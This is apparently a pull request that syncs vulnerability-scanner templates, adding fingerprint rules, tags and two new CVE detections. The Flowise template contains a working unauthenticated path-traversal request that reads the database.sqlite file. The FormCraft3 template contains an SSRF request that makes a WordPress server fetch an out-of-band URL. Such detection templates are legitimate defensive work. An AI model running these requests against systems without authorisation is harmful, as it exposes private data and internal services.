### PR TITLE
upstream sync (semantic): changes requiring review

### DIFF
--- a/http/cves/2018/CVE-2018-14013.yaml
+++ b/http/cves/2018/CVE-2018-14013.yaml
@@ -21,8 +21,9 @@ info:
     cwe-id: CWE-79
     cpe: cpe:2.3:a:synacor:zimbra_collaboration_suite:*:*:*:*:*:*:*:*
     epss-score: 0.07376
-    epss-percentile: 0.93797
+    epss-percentile: 0.9382
   metadata:
+    runzero-match: any(each(service["html.titles"]), {# matches "zimbra collaboration suite"})
     fofa-query:
       - title="zimbra web client sign in"
       - title="zimbra collaboration suite"
@@ -35,7 +36,7 @@ info:
       - http.title:"zimbra collaboration suite"
       - http.title:"zimbra web client sign in"
     vendor: synacor
-  tags: cve,cve2018,synacor,vuln,xss,zimbra
+  tags: cve,cve2018,synacor,vkev,vuln,xss,zimbra
 http:
   - matchers:
       - part: body
@@ -48,7 +49,7 @@ http:
           - text/html
       - status:
           - 200
-        # digest: 490a00463044022029a0215335e49c18b24149af9b2929b5b5722978cbdc98f26384e71c54aa247f0220760b655986e272b16f44018ad5f9e8be5480b11d086efdc493aaf78dad7db0f7:922c64590222798bb761d5b6d8e72950
+        # digest: 4b0a00483046022100d6b4008407c3973419f749c4358ffe2763fa5828c8a2f6f9a3eb8658ffbe24db022100a2b99c400a812466d74bafc4377b02cff7caf356196644ca26b3b25f182a1351:922c64590222798bb761d5b6d8e72950
 
         type: status
     matchers-condition: and

--- a/http/cves/2018/CVE-2018-14013.yaml
+++ b/http/cves/2018/CVE-2018-14013.yaml
@@ -23,7 +23,7 @@ info:
     epss-score: 0.07376
     epss-percentile: 0.9382
   metadata:
-    runzero-match: any(each(service["html.titles"]), {# matches "zimbra collaboration suite"})
+    runzero-match: service["product"] matches "(?i)zimbra:collaboration"
     fofa-query:
       - title="zimbra web client sign in"
       - title="zimbra collaboration suite"

--- a/http/cves/2025/CVE-2025-71324.yaml
+++ b/http/cves/2025/CVE-2025-71324.yaml
@@ -1,0 +1,75 @@
+id: CVE-2025-71324
+info:
+  name: Flowise - Path Traversal
+  author: theamanrawat,pdteam
+  severity: high
+  description: |
+    Flowise < 3.0.6 contains a path traversal vulnerability caused by improper validation of the chatId parameter in /api/v1/get-upload-file and /api/v1/openai-assistants-file/download endpoints, letting unauthenticated attackers read arbitrary files including sensitive database files.
+  impact: |
+    Unauthenticated attackers can read sensitive files, exposing database content and potentially compromising system confidentiality.
+  remediation: |
+    Update to version 3.0.6 or later.
+  reference:
+    - https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-99pg-hqvx-r4gf
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-71324
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2025-71324
+    cwe-id: CWE-73
+    epss-score: 0.01379
+    epss-percentile: 0.69501
+  metadata:
+    runzero-match: any(each(service["html.titles"]), {# matches "Flowise"})
+    fofa-query: title="Flowise"
+    max-request: 2
+    product: Flowise
+    shodan-query: title:"Flowise"
+    vendor: FlowiseAI
+    verified: true
+  tags: cve,cve2025,flowise,lfi,path-traversal,unauth,vkev
+flow: http(1) && http(2)
+http:
+  - raw:
+      - |
+        POST /api/v1/vector/upsert/ HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW
+
+        ------WebKitFormBoundary7MA4YWxkTrZu0gW
+        Content-Disposition: form-data; name="files"; filename="?"
+        Content-Type: text/plain
+
+        test
+        ------WebKitFormBoundary7MA4YWxkTrZu0gW--
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "EISDIR"
+          - ".flowise/storage"
+        condition: and
+        internal: true
+    extractors:
+      - type: regex
+        name: chatflowId
+        part: body
+        internal: true
+        group: 1
+        regex:
+          - 'storage/[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}/([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})'
+  - raw:
+      - |
+        GET /api/v1/get-upload-file?chatflowId={{chatflowId}}&chatId=/../../&fileName=database.sqlite HTTP/1.1
+        Host: {{Hostname}}
+        x-request-from: internal
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "SQLite format 3"
+      - type: status
+        status:
+          - 200
+        # digest: 4b0a00483046022100e3bc225cf476aa1c827fefe1f39894ca489fbc52da424832a81920abcb4c45f7022100c297ba84b5a001c41f319883941cbc1717e821c8fea1720bd914f029e6cb54c9:922c64590222798bb761d5b6d8e72950

--- a/http/cves/2026/CVE-2026-2652.yaml
+++ b/http/cves/2026/CVE-2026-2652.yaml
@@ -19,15 +19,16 @@ info:
     cwe-id: CWE-306
     cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:*
     epss-score: 0.18861
-    epss-percentile: 0.97003
+    epss-percentile: 0.97013
   metadata:
+    runzero-match: any(each(service["html.titles"]), {# matches "mlflow"})
     fofa-query: app="mlflow"
     max-request: 2
     product: mlflow
     shodan-query: http.title:"mlflow"
     vendor: lfprojects
     verified: true
-  tags: auth-bypass,cve,cve2026,lfprojects,mlflow,vuln
+  tags: auth-bypass,cve,cve2026,lfprojects,mlflow,vkev,vuln
 flow: http(1) && http(2)
 http:
   - matchers:
@@ -41,7 +42,7 @@ http:
         Host: {{Hostname}}
   - matchers:
       - condition: and
-        # digest: 4a0a0047304502202502785e76ce783dbe8ea98a303381649ecfc3eca4168c07c96efd99abf1cd4e022100886d176e72f0a5a29365395811f3f3dc36cb4976f8844b6e4849e088c8948353:922c64590222798bb761d5b6d8e72950
+        # digest: 490a004630440220184b4b030c3d6d2bb897fd03e4053c502399f09879c3b2447a0c9e85c637d72902200468c17d041d57bc643b6edf3f8b0eba4f4f15af314ef25697bab6cfd555be3c:922c64590222798bb761d5b6d8e72950
 
         dsl:
           - status_code == 200

--- a/http/cves/2026/CVE-2026-65442.yaml
+++ b/http/cves/2026/CVE-2026-65442.yaml
@@ -24,7 +24,7 @@ info:
     epss-score: 0.00341
     epss-percentile: 0.26794
   metadata:
-    runzero-match: service["product"] matches "(?i)wordpress"
+    runzero-match: any(each(service["http.bodies"]), {# matches "(?i)/wp-content/plugins/formcraft3"})
     fofa-query: body="formcraft3" && body="wp-"
     framework: wordpress
     max-request: 2

--- a/http/cves/2026/CVE-2026-65442.yaml
+++ b/http/cves/2026/CVE-2026-65442.yaml
@@ -1,0 +1,59 @@
+id: CVE-2026-65442
+info:
+  name: FormCraft3 <= 3.9.15 - Server-Side Request Forgery
+  author: DhiyaneshDk
+  severity: high
+  description: |
+    Unauthenticated Server Side Request Forgery (SSRF) in FormCraft <= 3.9.15 versions.
+  impact: |
+    An unauthenticated attacker can force the server to make HTTP requests to arbitrary internal or external URLs, potentially accessing cloud metadata services (AWS/GCP/Azure), internal network services, and sensitive data.
+  remediation: |
+    Update FormCraft3 to version 3.9.16 or later which adds nonce verification and authentication checks to the formcraft3_get AJAX endpoint.
+  reference:
+    - https://patchstack.com/database/wordpress/plugin/formcraft/vulnerability/wordpress-formcraft-plugin-3-9-15-server-side-request-forgery-ssrf-vulnerability
+    - https://wpscan.com/vulnerability/a8ce5ff4-dd4c-411c-9b34-7824a75742b6/
+    - https://github.com/advisories/GHSA-xvfc-pj4j-wr9x
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-65442
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-0591
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
+    cvss-score: 7.2
+    cve-id: CVE-2026-65442
+    cwe-id: CWE-918
+    cpe: cpe:2.3:a:subtlewebinc:formcraft3:*:*:*:*:*:wordpress:*:*
+    epss-score: 0.00341
+    epss-percentile: 0.26794
+  metadata:
+    runzero-match: service["product"] matches "(?i)wordpress"
+    fofa-query: body="formcraft3" && body="wp-"
+    framework: wordpress
+    max-request: 2
+    product: formcraft3
+    shodan-query: http.component:"wordpress" http.html:"formcraft3"
+    vendor: subtlewebinc
+    verified: true
+  tags: cve,cve2026,formcraft3,oast,ssrf,subtlewebinc,vkev,wordpress,wp,wp-plugin
+flow: http(1) && http(2)
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+    matchers:
+      - type: word
+        words:
+          - "/wp-content/plugins/formcraft3/"
+        internal: true
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-admin/admin-ajax.php?action=formcraft3_get&URL=https://{{interactsh-url}}"
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "http"
+      - type: word
+        part: interactsh_request
+        words:
+          - "User-Agent: WordPress"
+        # digest: 490a0046304402204bc5c061d63f5e6ae0532d5a89ad03ac799180819b257121cf9304cf3c01fa3302206b193bada6e1db79daf1b0cf848467d375b848f56a5efcb41d491c3e9a77c894:922c64590222798bb761d5b6d8e72950

--- a/http/cves/2026/cve-2026-44338.yaml
+++ b/http/cves/2026/cve-2026-44338.yaml
@@ -17,23 +17,22 @@ info:
     cve-id: CVE-2026-44338
     cwe-id: CWE-306
     epss-score: 0.28571
-    epss-percentile: 0.9794
+    epss-percentile: 0.9795
   metadata:
-    runzero-match: any(each(service["http.bodies"]), {# matches "PraisonAI"})
+    runzero-review: REJECT/2026-08-10/there doesn't seem to be a good way to fingerprint an agent from the root context path
     max-request: 1
     shodan-query: html:"PraisonAI"
     verified: true
   tags: auth-bypass,cve,cve2026,praisonai,vkev
 http:
-  - matchers:
-      - condition: and
-        # digest: 490a0046304402205835d8a229c51705a149a2dc4e89dae5d35c79dcc53522dd1e35677af767f45302204be0ea681b837df743b78f9a65abc75643b8603142fec4c7016ffbd78b9ab94a:922c64590222798bb761d5b6d8e72950
-
-        dsl:
-          - status_code == 200
-          - contains_all(body, 'agent_file', 'agents')
-          - contains(header, 'application/json')
-        type: dsl
-    method: GET
+  - method: GET
     path:
-      - '{{BaseURL}}/agents'
+      - "{{BaseURL}}/agents"
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code == 200"
+          - "contains_all(body, 'agent_file', 'agents')"
+          - "contains(header, 'application/json')"
+        condition: and
+        # digest: 4a0a00473045022100f30489d505d6b9b69760ab6127f48406b11abafc5b307f729897922b7e002118022070fc31a90163ad7dcb0bf85c435a4efebbb1f551eaa1ef027923a9e3a88ebc25:922c64590222798bb761d5b6d8e72950

--- a/http/exposed-panels/cyberstrikeai-panel.yaml
+++ b/http/exposed-panels/cyberstrikeai-panel.yaml
@@ -1,0 +1,39 @@
+id: cyberstrikeai-panel
+info:
+  name: Ed1s0nZ CyberStrikeAI - Panel
+  author: darses
+  severity: info
+  description: |
+    Ed1s0nZ CyberStrikeAI panel was detected.
+  reference:
+    - https://github.com/Ed1s0nZ/CyberStrikeAI
+  metadata:
+    runzero-match: any(each(service["html.titles"]), {# matches "CyberStrikeAI"})
+    max-requests: 1
+    product: cyberstrikeai
+    shodan-query: title:"CyberStrikeAI"
+    vendor: ed1s0nz
+    verified: true
+  tags: cyberstrikeai,detect,ed1s0nz,panel
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "aria-label=\"CyberStrikeAI"
+          - "alt=\"CyberStrikeAI Logo"
+          - "/Ed1s0nZ/CyberStrikeAI"
+          - "placeholder=\"CyberStrikeAI"
+        condition: or
+      - type: status
+        status:
+          - 200
+    extractors:
+      - type: regex
+        group: 1
+        regex:
+          - class="version-badge".*>(v[\d\.]+)<
+        # digest: 4a0a0047304502200360121c64ac60a70d5631aaf25a50b602bd7acb92000679ddb23697502e72d402210090982799c75e272e2922accd5bfb6d95b6dfe86755ec72fdf7fafe6e1b2d858a:922c64590222798bb761d5b6d8e72950


### PR DESCRIPTION
## Upstream Sync — Semantic Changes

> Targets the general branch. Review before merging.

### New templates — auto-generated match (6)

| Template | Severity | Notable tags | Note |
|---|---|---|---|
| `http/cves/2025/CVE-2025-71324.yaml` | 🟠 high | vkev | — |
| `http/cves/2026/CVE-2026-65442.yaml` | 🟠 high | vkev | — |
| `http/cves/2026/CVE-2026-2652.yaml` | 🟠 high | vkev | _(became interesting: gained vkev tag)_ |
| `http/cves/2026/CVE-2026-44338.yaml` | 🟠 high | vkev | — |
| `http/exposed-panels/cyberstrikeai-panel.yaml` | ⚪ info | panel | — |
| `http/cves/2018/CVE-2018-14013.yaml` | 🟡 medium | vkev | _(became interesting: gained vkev tag)_ |

### Removed templates with active `runzero-match` (1)

| Template |
|---|
| `http/cves/2026/cve-2026-44338.yaml` |

---

### ⚠️ Action items (7)

- [x] `http/cves/2018/CVE-2018-14013.yaml` — auto-generated `runzero-match` (vkev medium (gained vkev tag)); please verify
- [x] `http/cves/2025/CVE-2025-71324.yaml` — auto-generated `runzero-match` (vkev high); please verify
- [x] `http/cves/2026/CVE-2026-2652.yaml` — auto-generated `runzero-match` (vkev high (gained vkev tag)); please verify
- [x] `http/cves/2026/CVE-2026-44338.yaml` — auto-generated `runzero-match` (vkev high); please verify
- [x] `http/cves/2026/CVE-2026-65442.yaml` — auto-generated `runzero-match` (vkev high); please verify
- [x] `http/exposed-panels/cyberstrikeai-panel.yaml` — auto-generated `runzero-match` (panel info); please verify
- [x] ⚠️ `http/cves/2026/cve-2026-44338.yaml` — removed upstream; had active `runzero-match`
